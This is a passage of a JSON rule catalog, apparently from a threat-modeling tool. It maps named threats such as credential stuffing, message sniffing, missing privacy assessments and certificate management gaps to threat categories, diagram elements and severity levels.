injury","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f2ba26f4-b2da-49a8-aba2-14e42a746d6a","17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"5deb66fa-ff3e-49b6-b0d2-66a39708d259","DetailRestrictions":[]},"Severity":3},{"ID":"7892b860-7ed4-4109-ae03-3c290271fef6","Name":"User unawareness of data collection","Description":"Personal information such as talks, coughs, etc. is exposed and processed by an external system","IsActive":true,"RuleGenerationType":3,"Mapping":{"AttackVectorID":"7742f998-ab1e-4f64-8ac6-12b3f97b936a","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":true,"Target":0,"NodeTypes":[{"TypeIDs":["4b7a61d0-c430-48ea-8730-03a81542a5d8"]},{"TypeIDs":[]}],"NodeRestrictions":[]},"Severity":2},{"ID":"ba71d0ae-0a71-40d5-a3e3-f15c3a3baa2b","Name":"Location Tracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["61d04f2d-83b1-4152-9aba-4ad188eef06d","2765e61e-29a9-498e-adf8-4d653f488e3d","5278c995-f9d9-410e-b012-2995ba30c353","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"2460a6c9-40e5-44c7-b133-10c6654efd18","DetailRestrictions":[]},"Severity":2},{"ID":"b05b7085-3952-4f0d-bb85-7c380eb32f92","Name":"Full-scale outage","Description":"A full-scale outage may cause the solution to be unavailable for its users. This may be caused by natural events but also by a malicious actor.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"0a168b12-fc9a-411c-bbf0-59599d0181f8","DetailRestrictions":[]},"Severity":3},{"ID":"8d604765-2981-4a70-9cb0-9569411503cc","Name":"Attackers may be undetected","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"4a5bbdcf-ef9a-49cb-ac4c-a05dcefd95d2","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6e0c2499-9e6b-42da-8e9c-c34d40fca0db","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"2b0c94a0-f2c7-4068-86e4-2d5f7ed3fe94","Name":"Credential cracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"296e95fe-e06d-4ae3-be84-da98df4a122c","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":2},{"ID":"2c32278f-ea97-4aa1-8e85-982f76dee1b9","Name":"Credential stuffing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"0217b20a-5e3a-4244-8dce-819e28050a47","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":3},{"ID":"a777fa41-a13f-4225-af47-e4458a0c8f9e","Name":"Password spraying","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"1909127e-50bd-4892-8b1f-1a2123a4fa61","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"45244917-e4a2-4b03-89de-f18e9ddcad3f","DetailRestrictions":[]},"Severity":3},{"ID":"ab670c99-4f5c-41c7-974c-a6704df1661b","Name":"Unsecure default settings","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e060675a-41d0-4c4d-9e16-311bb4adec7b","ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"9ebe3a8f-eedb-40cd-9cbf-d1012a1829e2","DetailRestrictions":[]},"Severity":2},{"ID":"ab1d49fc-cb77-46cf-aeff-b4a28eb0d692","Name":"Undetected misuse of API","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"b125fa52-c06e-4e54-88b5-5e9d3929f643","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"e014189e-5d3c-40c7-aac2-23202be3ccd4","Name":"Unsecure management access","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6962d897-bf88-4745-9f2c-a8aa9d981f93","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"a89ed38a-c36b-445b-a8c2-89e7289cdb9e","Name":"Message sniffing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0","ComparisonType":"==","Value":false}}]},"Severity":4},{"ID":"104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59","Name":"Client spoofing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"de628891-642c-4b7c-b88b-abf7988721dc","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"2b82faea-2950-430d-8b52-273d9b0320e2","Name":"No privacy impact assessment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8f4a0dd3-2083-42eb-89bd-48480a082342","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"eaee9e9f-c3d7-42d7-9f8a-3d538cb9a17e","Name":"Outdated privacy impact assessment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3d756ae-7451-4738-986c-0e15d22cb2b2","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"03778e71-e9a1-4528-b1db-547990486b27","Name":"No safety impact assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"a1e7923f-848d-4532-b967-700925af1a77","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"359293f9-3fe1-4b61-99cb-332809add1f5","Name":"No fault tree analysis","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["17a04fbd-365f-4345-97f8-88d3c7382ec1"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"be1f1524-fd62-4957-a08d-844b070dbb00","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"60b7ed0a-97b4-4904-a3bf-6d3ebdf01954","Name":"No account management","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"524e227d-483e-45ae-b002-3041d15fe7e9","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"65c95996-5153-4f47-a7cd-0ffe05f96309","Name":"Weak authentication","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"330a4f44-1471-460d-889f-4f33a3b8ce72","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"23c52b69-1923-416b-99a4-620d36961365","Name":"Root privileges","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c8a14b27-b13f-4358-9f3f-691d01c97c77"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ce3cdda1-0737-468e-83e7-ca20098551d1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d0a3fe39-6894-44c5-91ec-1f1019ffda37","Name":"Certificates with long lifetime","Description":"Device certificates may be used without expiration. In this case, short-term operational certificates should be established.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"40c05808-37a1-4394-a9d5-8491b55c3a9b","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"fdc27962-5622-47e7-8de8-ca1b60009276","Name":"No revocation process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"083e93ef-da95-4064-a698-6fbd5cf997f5","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"d0bd34ae-02d2-46e9-b45a-0130be9713c4","Name":"No management policy","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"46d35b81-19e3-404e-9fe2-af5088971ffe","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"662c14ed-b7cf-490a-97b8-978836d022bb","Name":"No automated renewal process","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0c0d40fd-7f0a-412d-ae80-efce58906308","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"2d55c643-21db-426a-be29-d21f7f1965a4","Name":"No incident response team","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"25032887-439e-4599-84bf-05d906641a0b","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"3c1166bd-b978-4361-9846-33cd050dd968","Name":"No supply chain risk management program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"42b3d570-e03c-440d-b7a4-87614c6b2e2c","Name":"Risks from third party components","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2614fc88-29cb-4d84-9902-5f7ca7f98410","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d54bae32-33ff-4b3a-b583-07b53b4c947b","Name":"No regular penetration tests","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d4cb3498-4689-49f2-9f37-8bd45e62a972","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"58d38f0f-82b4-4ecb-a95f-237adcfcb58c","Name":"Missing privacy measures","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cf9cef5a-3e4e-47cd-aa03-22522a1ce3e9","Name":"Privacy law compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"ae2e4063-13cd-414e-811d-3d114365f85f","Name":"User rights and freedoms violation","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"db9dfe37-7599-4257-a425-e4948ffb8618","Name":"Insufficient user awareness","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"4c2aaafd-3248-4b30-b011-cddef8e75876","Name":"Missing opt-in mechanism","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["180a9034-735c-44ca-a96a-693cb48ffaa7","1180824d-9f8a-4a4a-8398-3775c541a360","2521b219-3d43-4fd8-bf96-d658eea44d01","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"44fd3f80-7e55-41af-b452-283556dd1894","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"c68e523a-cba1-41b2-95ce-c8d634fd4396","Name":"Missing SDL program","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a40575c4-b39f-4c9e-a4cb-3e15e3f27777","Name":"Missing responsibility for regulatory compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9db73879-4ec7-46ae-a8d9-1b555aac6954","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"8825c214-9562-4a85-8538-a0530d2b79ee","Name":"Missing responsibility for security compliance","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"ef631565-02d7-4f52-a80b-e615224409df","Name":"Missing responsibility for auditing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"61c1d062-4c94-4af4-bd64-26a632462653","Name":"Missing testing","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"e6f155e1-51e1-4297-80d9-a6a3beef3657","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"ca3e9dda-cb0d-4f16-8b14-d0b11e4210cb","Name":"Missing trusted execution environment","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"22e9ef37-20a4-4b6c-ba68-ecc90f1d152f","ComparisonType":"==","Value":false}}]}},{"ID":"88d04fe9-ac62-4371-89d3-89471ac13027","Name":"Missing isolation of cryptographic operations","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"28c99516-8651-452e-86f7-ce00df632c8d","ComparisonType":"==","Value":false}}]}},{"ID":"d5c0c703-75c1-42dd-a0d0-ca114eb7cdb4","Name":"Decryption of recorded traffic","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"6cce79b8-3df2-4eda-8892-e83b6a2ee603","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"9c362082-55b7-4c48-ac28-e381f5f38a2d","Name":"No external audit","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"8902950a-6c5e-426b-baa2-71794e74f720","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"b634e0fe-6f3f-4c75-9df4-98f589d3a3f0","Name":"Missing employee training and awareness","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"a05007e9-ca76-4584-a7be-47cf4a9625c4","Name":"No regular employee training","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"f424f4d3-b3c2-4718-8c5f-ec9b3b6eef74","Name":"No secure coding guidelines","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"ea8af3ca-0055-4d82-88af-711b356aec74","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"60fadd09-661b-494a-bcac-f0a652172a50","ComparisonType":"==","Value":false}}]}},{"ID":"1a54b8f3-ecd6-4704-9f6c-e05b7e948548","Name":"Missing end of support date","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"105910c0-a5b5-4496-a2f7-99f11422e4b0","Name":"Missing update interval information","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d","ComparisonType":"==","Value":false}}]},"Severity":1},{"ID":"8f8d0183-5a29-451a-bb84-df061c0728d4","Name":"Missing update notification","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"d406176c-9381-4f8c-aecc-b6d7ba56c7da","Name":"Full-scale outage","Description":"A full-scale outage may cause the solution to be unavailable for its users. This may be caused by natural events but also by a malicious actor.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"6f4e4f07-79e0-4f16-b447-dbc325b42e91","DetailRestrictions":[]},"Severity":2},{"ID":"ea3713af-49ae-4069-8353-78141725af6f","Name":"Missing time synchronization","Description":"A synchronized system time is necessary to correctly create and subsequently analyze logs.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c17cbe5c-3210-42fc-be1e-05f1f915865b"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8643278b-1ab3-4359-9ab9-f3911bf336e6","ComparisonType":"==","Value":false}}]},"Severity":2},{"ID":"1221dc8c-f495-4833-a027-c3c5d2dc1a7d","Name":"Collision attack","Description":"Attackers who can send a series of packets or messages may be able to overlap data. For example, packet 1 may be 100 bytes starting at offset 0. Packet 2 may be 100 bytes starting at offset 25. Packet 2 will overwrite 75 bytes of packet 1. Ensure you reassemble data before filtering it, and ensure you explicitly handle these sorts of cases.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"fec7c871-d868-4edf-9bca-80c9061e830b","Name":"JSON processing","Description":"If a dataflow contains JSON, JSON processing and hijacking threats may be 